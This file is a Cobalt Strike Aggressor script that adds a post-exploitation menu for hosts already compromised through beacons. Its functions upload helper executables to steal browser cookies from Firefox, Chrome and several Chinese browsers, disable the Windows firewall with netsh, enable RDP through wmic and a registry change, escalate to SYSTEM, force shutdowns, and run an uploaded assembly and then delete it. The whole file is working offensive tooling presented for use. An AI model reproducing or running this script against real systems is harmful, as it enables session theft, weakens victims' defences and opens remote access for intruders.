#define functions


sub Exec_sharpshell{
    local('$fpath $fname');
    $fpath = $3['file'];
    $fname = getFileName(replace($fpath, '\\\\', "/"));
    bupload($bid, $fpath);
    bexecute_assembly($bid, script_resource("post/Sharpshell.exe"), "\"".$fname."\"");
    bshell($bid,"del /F /S /Q $fname");
}

sub Steal_cookies{
    local('$type $prefix $isnew $cmd $isup $redirect $redbox');
    $type = lc($3['type']);
    $prefix = $3['prefix'];
    $isnew = lc($3['isnew']);
    $isup = lc($3['isup']);
    $redirect = $3['redirect'];
    $redbox = $3['redbox'];
    if ($type eq "Firefox"){
        $cmd = "cookies.exe firefox  $+ $prefix";
    }
    else if ($type eq "chrome"){
        if ($isnew eq "true"){
            $cmd = "chrome80.exe";
            
        }
        else{
            $cmd = "cookies.exe chrome";
        }
    }
    else {
        $cmd = "cookies.exe  $+ $type";
    }
    if ($redbox eq "true"){
        $cmd = "$cmd >  $+ $redirect";
    }
    if ($isup eq "true"){
        bshell($bid, $cmd);
    }
    else{
        bupload($bid, script_resource("gather/chrome80.exe"));
        bupload($bid, script_resource("gather/cookies.exe"));
        bshell($bid, $cmd);
    }
}

sub Close_firewall{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "netsh firewall set opmode disable");
       return;
   }
   brun($1, "netsh advfirewall set allprofiles state off");
}
sub Open_rdp{
   $ver = beacon_info($1['@'],"ver");
   if (double($ver) lt 5.2){
       brun($1, "wmic path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
       return;
   }
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !=\"\") call setallowtsconnections 1");
   brun($1, "wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName='RDP-Tcp') call setuserauthenticationrequired 1");
   brun($1, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
}
#append menus



    menu "Post"{
            item "Get &SYSTEM" {
                binput($1, "getsystem");
                bgetsystem($1);
            }

            item "Turn Off Firewall"{
                if (!-isadmin $1['@']){
                    show_error("Permission Denied!");
                    return;
                }
                Close_firewall($1);
            }

            item "Enable RDP"{
                local('$bid');
                $bid = $1;
                if (!-isadmin $bid['@']){
                    show_error("Permission Denied!");
                    return;
                }
                Open_rdp($1);
            }

            menu "Power"{
                item "Restart"{
                    bshell($1,"shutdown -r -t 0");
                }
                item "Power off"{
                    bshell($1,"shutdown -s -t 0");
                }
            }
            
            item "Sharpshell"{
                $bid = $1['@'];
                $dialog = dialog("SharpShell",%(bid => $bid), &Exec_sharpshell);
                dialog_description($dialog, "Execute powershell code without powershell.");
                drow_file($dialog, "file", "Choose: ");
                dbutton_action($dialog, "Go");
                dialog_show($dialog); 
            }

            item "Steal-cookie"{
                show_message("It is recommended to manually upload the files under the gather folder before using this function !");
                $bid = $1['@'];
                $dialog = dialog("Steal cookies",%(bid => $bid, isnew => "False", redirect => "Output.txt"), &Steal_cookies);
                dialog_description($dialog, "Stealing cookies from a browser stored in a local database.");
                drow_combobox($dialog, "type", "Type: ", @("Firefox", "Chrome", "2345", "QQ", "360", "360cse", "Sogou"));
                drow_text($dialog, "prefix", "Prefix: ");
                drow_combobox($dialog, "isnew", "80.x: ", @("True", "False"));
                drow_combobox($dialog, "isup", "Isuploaded: ", @("True", "False"));
                drow_checkbox($dialog, "redbox", "Output redirection: ", "");
                drow_text($dialog, "redirect", "");
                dbutton_action($dialog, "Exec");
                dialog_show($dialog);
            }
    }
